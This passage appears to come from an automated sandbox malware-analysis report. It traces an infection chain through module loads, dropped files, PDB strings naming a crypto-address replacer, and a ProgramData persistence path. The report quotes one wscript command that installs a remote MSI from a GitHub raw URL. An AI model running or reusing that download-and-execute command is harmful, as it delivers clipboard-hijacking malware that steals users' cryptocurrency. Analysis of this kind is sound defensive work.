                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: http_dll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80loc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: http_dll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80loc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: oleacc.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: version.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: shfolder.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: http_dll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80loc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msftedit.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: comsvcs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmlua.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: http_dll.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80eng.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: mfc80loc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pla.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: pdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: tdh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: cabinet.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: RaftelibeGasrss.lnk.7.drLNK file: ..\..\..\..\..\..\..\..\..\ProgramData\RaftelibeGasrss\RaftelibeGasrss.exe
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Windows\SysWOW64\msftedit.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                      Source: Binary string: C:\Users\root\Desktop\clipmain\CryptoAddressReplacer\Release\CryptoAddressReplacer.pdb source: Updwork.exe, 00000007.00000003.2472818121.00000000021F0000.00000004.00001000.00020000.00000000.sdmp, Updwork.exe, 00000007.00000003.2472764493.00000000023C0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000014.00000002.3386555271.00000000024C1000.00000002.00000400.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765936238.0000000002930000.00000004.00001000.00020000.00000000.sdmp, RaftelibeGasrss.exe, 00000016.00000003.2765868218.0000000002980000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 0000001B.00000002.3386408179.0000000000421000.00000002.00000400.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: msvcr80.i386.pdb source: msvcr80.dll.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\http_server\winnt32\EHttpSrv.pdb@@P5@ source: EHttpSrv.exe, 00000006.00000000.2277424439.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000006.00000002.2333090341.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000002.2441043079.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000000F.00000000.2387457596.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000002.2754803163.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000017.00000000.2671664979.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000000.2727976985.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000018.00000002.2780689500.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000002.2885414724.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 0000001D.00000000.2832914640.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000000.3017969340.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe, 00000020.00000002.3108167412.0000000000403000.00000002.00000001.01000000.00000005.sdmp, EHttpSrv.exe.3.dr
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdbd1J source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: wntdll.pdbUGP source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: MFC80U.i386.pdb source: EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.dr
                      Source: Binary string: wntdll.pdb source: EHttpSrv.exe, 00000006.00000002.2335103894.0000000002489000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390158763.0000000004EC4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390431920.0000000005330000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2442018605.0000000002461000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755121582.0000000004C47000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755743248.00000000050B0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755650808.00000000021DE000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755930369.0000000002650000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781243411.0000000002416000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833515028.00000000047CE000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833756998.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886143082.00000000024D9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107403303.0000000004854000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107631545.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108699557.0000000002112000.00000004.00000020.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3109126752.00000000025A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\installbuild\kalab\ess_4_0_400\build\apps\work\release\epfw\winnt32\eguiEpfw.pdb source: EHttpSrv.exe, 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000000F.00000002.2442351664.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 00000018.00000002.2781571152.0000000020483000.00000002.00000001.01000000.00000007.sdmp, EHttpSrv.exe, 0000001D.00000002.2886495130.0000000020483000.00000002.00000001.01000000.00000007.sdmp, http_dll.dll.3.dr
                      Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr

                      Data Obfuscation

                      barindex
                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("msiexec.exe /i https://github.com/Kroby5444/Jim/raw/refs/heads/main/Slf.ms", "0", "false");
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_00401000 GetCommandLineW,GetCommandLineW,wcsstr,wcsstr,GetCommandLineW,wcsstr,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetCommandLineW,wcsstr,FreeLibrary,FreeLibrary,6_2_00401000
                      Source: dsx.30.drStatic PE information: real checksum: 0x0 should be: 0x84c79
                      Source: Updwork.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x8a18a
                      Source: yljutqdulam.16.drStatic PE information: real checksum: 0x0 should be: 0x84c79
                      Source: http_dll.dll.3.drStatic PE information: real checksum: 0xe0ba0 should be: 0xe21bb
                      Source: zlib1.dll.7.drStatic PE information: real checksum: 0x29cf3 should be: 0x5c414
                      Source: zlib1.dll.7.drStatic PE information: section name: .eh_fram
                      Source: yljutqdulam.16.drStatic PE information: section name: umlwqq
                      Source: dsx.30.drStatic PE information: section name: umlwqq
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_004021B1 push ecx; ret 6_2_004021C4
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2047906D push ecx; ret 6_2_20479080
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 6_2_2043DD30 push ecx; mov dword ptr [esp], 00000080h6_2_2043DD31
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E972DE push cs; iretd 7_2_62E972B2
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E9D751 push ebx; ret 7_2_62E9D752
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E9A8B3 push es; iretd 7_2_62E9A9B4
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E9748E push ebx; ret 7_2_62E9748F
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeCode function: 7_2_62E971DC push cs; iretd 7_2_62E972B2
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_004021B1 push ecx; ret 15_2_004021C4
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_2047906D push ecx; ret 15_2_20479080
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exeCode function: 15_2_2043DD30 push ecx; mov dword ptr [esp], 00000080h15_2_2043DD31
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C5A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\msvcr80.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Updwork.exeFile created: C:\Users\user\AppData\Local\Temp\RaftelibeGarss\zlib1.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3C7A.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3BAC.tmpJump to dropped file
